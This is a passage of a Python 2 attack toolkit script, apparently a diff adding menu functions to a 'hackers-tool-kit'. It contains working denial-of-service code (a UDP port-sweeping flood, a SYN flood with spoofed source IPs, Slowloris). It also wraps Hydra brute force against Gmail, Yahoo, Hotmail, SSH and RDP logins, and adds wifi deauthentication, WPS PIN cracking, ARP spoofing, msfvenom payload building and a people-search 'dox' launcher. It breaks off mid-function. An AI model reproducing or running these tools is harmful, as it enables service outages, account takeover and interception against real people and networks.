+#---------------------------# +#ALL METASPLOIT EXPLOITS END# + + +#UDP DOS START# +#-------------# +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +#-----------# +#UDP DOS END# + +#TCP FLOOD START# +#---------------# +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +#-------------# +#TCP FLOOD END# + + +#SYN FLOOD START# +#---------------# +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() +#-------------# +#SYN FLOOD END# + + +#PING A HOST START# +#-----------------# +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +#---------------# +#PING A HOST END# + + +#ALL METASPLOIT PAYLOADS START# +#-----------------------------# +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +#---------------------------# +#ALL METASPLOIT PAYLOADS END# + + +#ALL METASPLOIT AUX START# +#------------------------# +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +#----------------------# +#ALL METASPLOIT AUX END# + + +#START METASPLOIT HANDLER START# +#------------------------------# +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +#----------------------------# +#START METASPLOIT HANDLER END# + + +#ALL METASPLOIT MODS START# +#-------------------------# +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +#-----------------------# +#ALL METASPLOIT MODS END# + + +#HYDRA AUTOMATED START# +#---------------------# +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +#-------------------# +#HYDRA AUTOMATED END# + + +#WORDLIST MAKER START# +#--------------------# +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +#------------------# +#WORDLIST MAKER END# + + +#LIST FILES START# +#----------------# +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" +#--------------# +#LIST FILES END# + + +#MONITOR MODE OFF START# +#----------------------# +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +#--------------------# +#MONITOR MODE OFF END# + + +#TURN ON VPN START# +#-----------------# +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +#---------------# +#TURN ON VPN END# + + +#TURN OFF VPN START# +#------------------# +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +#----------------# +#TURN OFF VPN END# + + +#SLOW LORIS DOS START# +#--------------------# +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') +#------------------# +#SLOW LORIS DOS END# + + +#OPEN DOX WEBSITE START# +#----------------------# +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +#--------------------# +#OPEN DOX WEBSITE END# + + +#SCAN SPECIFIC NET START# +#-----------------------# +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +#---------------------# +#SCAN SPECIFIC NET END# + + +#DEFAULT WIFI PIN START# +#----------------------# +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +#--------------------# +#DEFAULT WIFI PIN END# + + +#WIFI PIN BRUTEFORCE START# +#-------------------------# +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +#-----------------------# +#WIFI PIN BRUTEFORCE END# + + +#DEAUTH ATTACK START# +#-------------------# +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +#-----------------# +#DEAUTH ATTACK END# + + +#MAC CHANGER START# +#-----------------# +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-----------------# +#MAC CHANGER START# + + +#MAC CHANGER OFF START# +#---------------------# +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-------------------# +#MAC CHANGER OFF END# + + +#ARP SPOOF START# +#---------------# +def arpspoof(): + print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" + h = raw_input("Targets: ") + os.system('echo "net.sniff on\n" >> arp.cap') + os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) + os.system('echo "arp.spoof on\n" >> arp.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet arp.cap") + os.system("rm arp.cap") +#-------------# +#ARP SPOOF END# + + +#SSL SCAN START# +#--------------# +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +#------------# +#SSL SCAN END# + + +#MAKE A PAYLOAD START# +#--------------------# +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + print "\nExamples: py, php, exe\n" + s = raw_input("File Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) + os.system(a) +#------------------# +#MAKE A PAYLOAD END# + + +#WORDLIST MAKER START# +#--------------------# +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +#------------------# +#WORDLIST MAKER END# + + +#INTERNET TRAFFIC START# +#----------------------# +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +#--------------------# +#INTERNET TRAFFIC END# + + +#RESET ACCOUNT PASSWORD START# +#----------------------------# +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +#--------------------------# +#RESET ACCOUNT PASSWORD END# + + +#RESET UNIX PASSWORD START# +#-------------------------# +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +#-----------------------# +#RESET UNIX PASSWORD END# + + +#FIND HASH TYPE START# +#--------------------# +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + 